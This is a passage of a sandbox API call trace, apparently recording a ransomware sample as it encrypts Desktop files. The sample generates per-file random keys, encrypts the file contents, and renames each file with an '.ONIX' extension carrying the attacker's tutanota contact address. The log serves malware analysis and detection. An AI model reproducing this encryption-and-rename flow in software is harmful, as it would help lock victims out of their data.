HALPmcxz\\Desktop\\0ysD_efg7c4bcP.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0ysD_efg7c4bcP.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0ysD_efg7c4bcP.flv" [0120.070] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0ysD_efg7c4bcP.flv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0ysD_efg7c4bcP.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0ysD_efg7c4bcP.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.070] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=82060) returned 1 [0120.070] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1408c [0120.070] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.070] GetProcessHeap () returned 0x410000 [0120.070] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0120.070] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.072] WriteFile (in: hFile=0x4a4, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.073] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.074] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.075] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1408c) returned 0xf50048 [0120.076] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1408c) returned 0xf640e0 [0120.076] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.076] ReadFile (in: hFile=0x4a4, lpBuffer=0xf50048, nNumberOfBytesToRead=0x1408c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x1408c, lpOverlapped=0x0) returned 1 [0120.079] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-82060, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.079] WriteFile (in: hFile=0x4a4, lpBuffer=0xf640e0*, nNumberOfBytesToWrite=0x1408c, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf640e0*, lpNumberOfBytesWritten=0x367f44c*=0x1408c, lpOverlapped=0x0) returned 1 [0120.080] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0120.080] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf640e0 | out: hHeap=0x410000) returned 1 [0120.080] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1408c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.080] CloseHandle (hObject=0x4a4) returned 1 [0120.082] GetProcessHeap () returned 0x410000 [0120.082] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.082] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0ysD_efg7c4bcP.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0ysd_efg7c4bcp.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0ysD_efg7c4bcP.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0ysd_efg7c4bcp.flv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.084] GetProcessHeap () returned 0x410000 [0120.084] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.084] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.084] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.084] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0120.084] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x777eb0, ftCreationTime.dwHighDateTime=0x1d5e07e, ftLastAccessTime.dwLowDateTime=0x6ab60c10, ftLastAccessTime.dwHighDateTime=0x1d5e62d, ftLastWriteTime.dwLowDateTime=0x6ab60c10, ftLastWriteTime.dwHighDateTime=0x1d5e62d, nFileSizeHigh=0x0, nFileSizeLow=0xf804, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="38L7VJaT2H1l.png", cAlternateFileName="38L7VJ~1.PNG")) returned 1 [0120.084] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.084] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.084] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.084] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.084] GetLastError () returned 0x0 [0120.084] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38L7VJaT2H1l.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\38l7vjat2h1l.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.084] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.085] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xf804, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.085] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.085] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.086] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.086] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.086] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.086] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.086] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38L7VJaT2H1l.png", dwFileAttributes=0x80) returned 1 [0120.086] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38L7VJaT2H1l.png") returned 55 [0120.086] GetProcessHeap () returned 0x410000 [0120.086] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xde) returned 0x460008 [0120.086] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38L7VJaT2H1l.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38L7VJaT2H1l.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38L7VJaT2H1l.png" [0120.086] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38L7VJaT2H1l.png", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38L7VJaT2H1l.png.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38L7VJaT2H1l.png.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.086] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=63492) returned 1 [0120.086] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xf804 [0120.086] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.086] GetProcessHeap () returned 0x410000 [0120.086] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0120.086] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.088] WriteFile (in: hFile=0x4a4, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.090] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.091] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.092] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf804) returned 0x4d8b68 [0120.092] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf804) returned 0xf50048 [0120.093] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.093] ReadFile (in: hFile=0x4a4, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0xf804, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0xf804, lpOverlapped=0x0) returned 1 [0120.095] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-63492, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.095] WriteFile (in: hFile=0x4a4, lpBuffer=0xf50048*, nNumberOfBytesToWrite=0xf804, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesWritten=0x367f44c*=0xf804, lpOverlapped=0x0) returned 1 [0120.097] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0120.097] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0120.097] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xf804, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.097] CloseHandle (hObject=0x4a4) returned 1 [0120.098] GetProcessHeap () returned 0x410000 [0120.098] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.098] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38L7VJaT2H1l.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\38l7vjat2h1l.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38L7VJaT2H1l.png.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\38l7vjat2h1l.png.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.100] GetProcessHeap () returned 0x410000 [0120.100] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.100] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.100] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.100] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d858 | out: hHeap=0x410000) returned 1 [0120.100] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d3e8f0, ftCreationTime.dwHighDateTime=0x1d5dc8c, ftLastAccessTime.dwLowDateTime=0x2d9f2370, ftLastAccessTime.dwHighDateTime=0x1d5e5ab, ftLastWriteTime.dwLowDateTime=0x2d9f2370, ftLastWriteTime.dwHighDateTime=0x1d5e5ab, nFileSizeHigh=0x0, nFileSizeLow=0x101c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="38RBYHDL-.png", cAlternateFileName="38RBYH~1.PNG")) returned 1 [0120.100] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.100] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.100] GetLastError () returned 0x0 [0120.100] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38RBYHDL-.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\38rbyhdl-.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.100] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.101] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x101c7, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.101] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.101] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.101] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.101] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.102] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.102] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.102] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38RBYHDL-.png", dwFileAttributes=0x80) returned 1 [0120.102] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38RBYHDL-.png") returned 52 [0120.102] GetProcessHeap () returned 0x410000 [0120.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd8) returned 0x460008 [0120.102] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38RBYHDL-.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38RBYHDL-.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38RBYHDL-.png" [0120.102] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38RBYHDL-.png", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38RBYHDL-.png.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38RBYHDL-.png.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.102] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=65991) returned 1 [0120.102] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x101c7 [0120.102] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.102] GetProcessHeap () returned 0x410000 [0120.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0120.102] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.104] WriteFile (in: hFile=0x4a4, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.106] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.107] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.108] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x101c7) returned 0x4d8b68 [0120.108] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x101c7) returned 0xf50048 [0120.109] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.109] ReadFile (in: hFile=0x4a4, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x101c7, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x101c7, lpOverlapped=0x0) returned 1 [0120.111] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-65991, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.111] WriteFile (in: hFile=0x4a4, lpBuffer=0xf50048*, nNumberOfBytesToWrite=0x101c7, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesWritten=0x367f44c*=0x101c7, lpOverlapped=0x0) returned 1 [0120.112] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0120.112] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0120.112] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x101c7, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.112] CloseHandle (hObject=0x4a4) returned 1 [0120.113] GetProcessHeap () returned 0x410000 [0120.113] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.113] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38RBYHDL-.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\38rbyhdl-.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\38RBYHDL-.png.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\38rbyhdl-.png.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.115] GetProcessHeap () returned 0x410000 [0120.115] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.115] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.115] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.115] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d858 | out: hHeap=0x410000) returned 1 [0120.115] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65c16270, ftCreationTime.dwHighDateTime=0x1d5d80b, ftLastAccessTime.dwLowDateTime=0xe5263700, ftLastAccessTime.dwHighDateTime=0x1d5deed, ftLastWriteTime.dwLowDateTime=0xe5263700, ftLastWriteTime.dwHighDateTime=0x1d5deed, nFileSizeHigh=0x0, nFileSizeLow=0xdf17, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3aPBPaeVJXGnSEo9.swf", cAlternateFileName="3APBPA~1.SWF")) returned 1 [0120.115] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.116] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.116] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.116] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.116] GetLastError () returned 0x0 [0120.116] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3aPBPaeVJXGnSEo9.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3apbpaevjxgnseo9.swf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.116] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.116] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xdf17, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.116] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.116] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.117] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.117] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.117] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.117] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.117] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3aPBPaeVJXGnSEo9.swf", dwFileAttributes=0x80) returned 1 [0120.117] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3aPBPaeVJXGnSEo9.swf") returned 59 [0120.117] GetProcessHeap () returned 0x410000 [0120.118] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe6) returned 0x460008 [0120.118] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3aPBPaeVJXGnSEo9.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3aPBPaeVJXGnSEo9.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3aPBPaeVJXGnSEo9.swf" [0120.118] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3aPBPaeVJXGnSEo9.swf", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3aPBPaeVJXGnSEo9.swf.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3aPBPaeVJXGnSEo9.swf.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.118] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=57111) returned 1 [0120.118] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xdf17 [0120.118] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.118] GetProcessHeap () returned 0x410000 [0120.118] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0120.118] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.120] WriteFile 